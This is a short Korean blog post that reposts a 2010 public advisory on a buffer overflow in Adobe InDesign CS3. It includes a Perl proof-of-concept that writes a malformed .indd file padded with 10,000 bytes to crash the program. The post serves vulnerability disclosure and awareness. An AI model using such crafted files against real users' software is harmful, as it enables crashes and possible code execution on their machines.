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[Adobe]Adobe InDesign CS3 INDD File Handling Buffer Overflow Vulnerability

by 잡다한 처리 2010. 6. 11.

어도브(Adobe)사의 제품 중 InDesign CS3 제품의 취약점이 발견되었다.

오늘 패치했는데 ㅡ.ㅡ;; 정말 패치한지 얼마 안됬는데!!
Adobe 정말 바쁘겠당 ㅎㅎ

벌써 POC까지 공개되었으니, 이것 또한 위험하다 ㅠ.ㅠ

- Exploit Code
# Adobe InDesign CS3 INDD File Handling Buffer Overflow Vulnerability
# Vendor: Adobe Systems Inc.
# Product Web Page: http://www.adobe.com
# Version tested: CS3 10.0
# Summary: Adobe® InDesign® CS3 software provides precise control over
# typography and built-in creative tools for designing, preflighting,
# and publishing documents for print, online, or to mobile devices. Include
# interactivity, animation, video, and sound in page layouts to fully engage
# readers.
# Desc: When parsing .indd files to the application, it crashes instantly
# overwriting memory registers. Depending on the offset, EBP, EDI, EDX and
# ESI gets overwritten. Pottential vulnerability use is arbitrary code execution
# and denial of service.
# Tested on Microsoft Windows XP Professional SP3 (English)
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# liquidworm gmail com
# Zero Science Lab - http://www.zeroscience.mk
# 16.09.2009
# Vendor status:
# [16.09.2009] Vulnerability discovered.
# [09.03.2010] Vulnerability reported to vendor with sent PoC files.
# [21.03.2010] Asked confirmation from the vendor.
# [21.03.2010] Vendor asked for PoC files due to communication errors.
# [22.03.2010] Re-sent PoC files to vendor.
# [04.04.2010] Vendor confirms vulnerability.
# [03.06.2010] Vendor informs that they discontinued support for CS3 since CS5 is out.
# [04.06.2010] Public advisory released.
# Zero Science Lab Advisory ID: ZSL-2010-4941
# Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4941.php
# Raw PoC code:

$header = "\x06\x06\xED\xF5\xD8\x1D\x46\xE5\xBD\x31\xEF\xE7\xFE\x74\xB7\x1D\x44\x4F\x43\x55\x4D\x45\x4E\x54\x01";

$fn = "teppei.indd";

$bof = "\x41" x 10000;

print "\n\n[*] Creating PoC file: $fn ...\r\n";


open(indd, ">./$fn") || die "\n\aCannot open $fn : $!";

print indd "$header" . "$bof";

close (indd);

print "\n[*] PoC file successfully created!\r\n";
